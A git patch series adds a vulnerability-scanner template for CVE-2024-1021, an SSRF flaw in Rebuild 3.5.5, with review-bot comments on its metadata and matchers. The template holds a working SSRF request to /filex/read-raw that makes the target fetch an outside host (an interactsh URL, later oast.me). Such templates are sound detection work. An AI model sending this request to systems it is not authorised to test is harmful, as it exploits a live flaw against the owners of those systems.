From 9ca4920ad81b2e4a1ae3a64d146fe8ebf0ebf6ef Mon Sep 17 00:00:00 2001
From: bmcxxx
Date: Sun, 25 Feb 2024 12:56:05 +0800
Subject: [PATCH 1/2] Add CVE-2024-1021
---
http/cves/2024/CVE-2024-1021.yaml | 36 +++++++++++++++++++++++++++++++
1 file changed, 36 insertions(+)
create mode 100644 http/cves/2024/CVE-2024-1021.yaml
diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml
new file mode 100644
index 0000000000..3d45b8445b
--- /dev/null
+++ b/http/cves/2024/CVE-2024-1021.yaml
@@ -0,0 +1,36 @@
+id: CVE-2024-1021
+
+info:
+ name: Rebuild <= 3.5.5 - Server-Side Request Forgery
+ author: BMCel
+ severity: medium
+ description: |
+ There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
+ impact: |
+ Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
+ remediation: |
+ Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-1021
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-1021
+ - https://github.com/getrebuild/rebuild
+ metadata:
+ max-request: 1
+ tags: cve2024,cve,rebuild,ssrf
+
+http:
+ - raw:
+ - |
+ GET /filex/read-raw?url=http://{{interactsh-url}}&cut=1 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+ - type: status
+ status:
+ - 200
From dc6427607f68d96d57d1fa3703f9ad00990ed5c4 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 25 Feb 2024 14:30:15 +0530
Subject: [PATCH 2/2] updated matchers, payload & request
---
http/cves/2024/CVE-2024-1021.yaml | 28 +++++++++++++---------------
1 file changed, 13 insertions(+), 15 deletions(-)
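Review bot: The `info` block of the template added in PATCH 1/2 has no `classification` section, so a finding is reported without the CVE/CWE mapping that triage and deduplication tooling keys on. Adding `classification:` with `cve-id: CVE-2024-1021` and `cwe-id: CWE-918` under `info` would close that gap; any CVSS fields should be copied from the NVD entry already listed under `reference` rather than estimated. The `name` says `<= 3.5.5` while the `description` only mentions 3.5.5, so the affected range should be stated the same way in both. The `remediation` text is generic and would be more useful if it named the first fixed Rebuild release once that is confirmed upstream.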
diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index 3d45b8445b..7e6acd833a 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -11,26 +11,24 @@ info: remediation: | Apply the latest security patches or updates provided by Rebuild to fix this vulnerability. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-1021 - - https://nvd.nist.gov/vuln/detail/CVE-2024-1021 - https://github.com/getrebuild/rebuild + - https://nvd.nist.gov/vuln/detail/CVE-2024-1021 metadata: max-request: 1 + verified: true + fofa-query: icon_hash="871154672" tags: cve2024,cve,rebuild,ssrf http: - - raw: - - | - GET /filex/read-raw?url=http://{{interactsh-url}}&cut=1 HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1" - matchers-condition: and matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains(body_2, "

Interactsh Server

")' + - '!contains(body_1, "

Interactsh Server

")' + - 'status_code_2 == 200' + condition: and
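Review bot: `metadata.max-request` is left at `1` in the unchanged context, but the rewritten `http` block now lists two entries under `path`, so it should read `max-request: 2`. The new check also replaces the per-scan `{{interactsh-url}}` with the fixed public host `http://oast.me` and matches on that host's landing-page text in `body_2`. A target with filtered egress, or any change to that page, therefore yields a false negative, and every scan makes the target fetch a third-party site. Keeping the removed `interactsh_protocol` matcher as an alternative condition would still cover blind or egress-restricted deployments. A comment above the `dsl` lines, e.g. `# body_1 is the baseline: rules out pages that already contain the marker`, would make the negative check's purpose clear to maintainers.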